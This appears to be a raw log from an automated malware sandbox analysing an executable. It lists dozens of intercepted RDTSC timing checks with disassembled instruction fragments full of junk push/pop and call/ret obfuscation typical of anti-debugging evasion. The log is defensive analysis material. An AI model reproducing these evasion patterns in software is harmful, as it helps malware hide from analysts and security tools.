Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DF08 second address: B2DF23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DC54 second address: B2DC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA6CD35B926h 0x0000000f jmp 00007FA6CD35B920h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DC73 second address: B2DC78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2E97B second address: B2E9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FA6CD35B918h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 jmp 00007FA6CD35B923h 0x00000029 push 00000000h 0x0000002b mov edi, ecx 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f jc 00007FA6CD35B918h 0x00000035 pushad 0x00000036 popad 0x00000037 jmp 00007FA6CD35B91Dh 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f je 00007FA6CD35B918h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2FE11 second address: B2FE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B319FB second address: B319FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B319FF second address: B31A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B31A05 second address: B31A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B91Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B31A13 second address: B31A5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jbe 00007FA6CC859ECCh 0x0000000f mov ebx, dword ptr [ebp+122D3904h] 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D3878h] 0x0000001d push 00000000h 0x0000001f or dword ptr [ebp+122D185Fh], ecx 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007FA6CC859EDFh 0x0000002e jmp 00007FA6CC859ED9h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B32964 second address: B3296E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA6CD35B916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B33867 second address: B3386C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B32B0D second address: B32B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B34731 second address: B34736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B34857 second address: B3485B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B348FD second address: B34902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B35954 second address: B3595C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3595C second address: B35960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B389AE second address: B389B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B37B87 second address: B37B9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jns 00007FA6CC859EC6h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B37B9C second address: B37C2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1848h], ebx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c ja 00007FA6CD35B91Ch 0x00000022 mov dword ptr [ebp+122D2D69h], edi 0x00000028 mov eax, dword ptr [ebp+122D0F31h] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FA6CD35B918h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov edi, ecx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007FA6CD35B918h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 0000001Ch 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 jmp 00007FA6CD35B926h 0x0000006b nop 0x0000006c push ecx 0x0000006d push eax 0x0000006e push edx 0x0000006f jbe 00007FA6CD35B916h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3A92C second address: B3A9AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FA6CC859EEBh 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D2A7Ch], ebx 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b push edi 0x0000001c mov edi, dword ptr [ebp+122D3948h] 0x00000022 pop edx 0x00000023 mov cx, C2F8h 0x00000027 popad 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FA6CC859EC8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov di, si 0x00000047 xchg eax, esi 0x00000048 push edx 0x00000049 jmp 00007FA6CC859ECAh 0x0000004e pop edx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 pushad 0x00000054 popad 0x00000055 pop ecx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3A9AF second address: B3A9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3BA3B second address: B3BA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 mov edi, dword ptr [ebp+122D28EAh] 0x0000000b mov edi, dword ptr [ebp+122D2949h] 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+1245CBAEh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FA6CC859EC8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov bx, cx 0x00000038 mov edi, esi 0x0000003a mov dword ptr [ebp+12449416h], ebx 0x00000040 push eax 0x00000041 jng 00007FA6CC859ECEh 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B38B2F second address: B38B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B38B33 second address: B38B3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B38B3D second address: B38BBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b ja 00007FA6CD35B91Ah 0x00000011 nop 0x00000012 clc 0x00000013 push dword ptr fs:[00000000h] 0x0000001a or dword ptr [ebp+122D17ECh], eax 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 ja 00007FA6CD35B918h 0x0000002d mov eax, dword ptr [ebp+122D0EC9h] 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FA6CD35B918h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d sub ebx, dword ptr [ebp+122D38C8h] 0x00000053 mov di, ED10h 0x00000057 push FFFFFFFFh 0x00000059 jnc 00007FA6CD35B91Bh 0x0000005f push eax 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 pop ecx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CBE1 second address: B3CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D37C4h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FA6CC859EC8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jmp 00007FA6CC859ECAh 0x00000030 sbb edi, 0734E6C7h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FA6CC859EC8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 cmc 0x00000053 xchg eax, esi 0x00000054 jmp 00007FA6CC859ECEh 0x00000059 push eax 0x0000005a jnp 00007FA6CC859ED4h 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 pop esi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CDF7 second address: B3CE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B927h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CE13 second address: B3CE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CEEA second address: B3CEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B920h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CEFE second address: B3CF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3CF04 second address: B3CF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3DD83 second address: B3DD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B44B66 second address: B44B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jg 00007FA6CD35B916h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B44B76 second address: B44B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A03B second address: B4A03F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1A7 second address: B4A1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1AD second address: B4A1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6CD35B91Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1C2 second address: B4A1C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1C6 second address: B4A1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4A1D2 second address: B4A1D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4EBCB second address: B4EBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA6CD35B922h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B4EBEC second address: B4EBFD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6CC859EC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B501D5 second address: B501DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B57362 second address: B57375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA6CC859ECEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B57375 second address: B5738A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FA6CD35B91Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AED3F4 second address: AED3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5679D second address: B567AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA6CD35B91Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56A8C second address: B56A91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56A91 second address: B56AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B923h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6CD35B928h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56AC3 second address: B56AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B56AC7 second address: B56ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FA6CD35B91Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B602F9 second address: B60305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B60305 second address: B60320 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6CD35B925h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B60320 second address: B60325 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5F00D second address: B5F011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5F011 second address: B5F02C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5F02C second address: B5F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5FA1F second address: B5FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B5FA27 second address: B5FA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B64B8F second address: B64B9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6CC859EC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B64B9C second address: B64BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6CD35B916h 0x0000000a pop esi 0x0000000b jmp 00007FA6CD35B91Dh 0x00000010 popad 0x00000011 push edi 0x00000012 jl 00007FA6CD35B91Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B64BBE second address: B64BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B267D5 second address: B267D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B267D9 second address: B26815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 js 00007FA6CC859ED1h 0x0000000e jmp 00007FA6CC859ECBh 0x00000013 nop 0x00000014 jo 00007FA6CC859ED0h 0x0000001a jmp 00007FA6CC859ECAh 0x0000001f lea eax, dword ptr [ebp+1247A528h] 0x00000025 or ecx, dword ptr [ebp+122D3AC0h] 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B26815 second address: B26819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F40D second address: B9F411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F411 second address: B9F430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B929h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA05DB second address: BA05F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA05F1 second address: BA05F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA6214 second address: BA621F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA6CC859EC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA621F second address: BA622B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007FA6CD35B916h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5CBE second address: BA5CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5E1F second address: BA5E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA6CD35B916h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5E3A second address: BA5E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5E44 second address: BA5E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7910 second address: BB7916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7916 second address: BB791C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB746E second address: BB7474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7474 second address: BB7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA6CD35B918h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7482 second address: BB749E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBA183 second address: BBA199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA6CD35B91Dh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
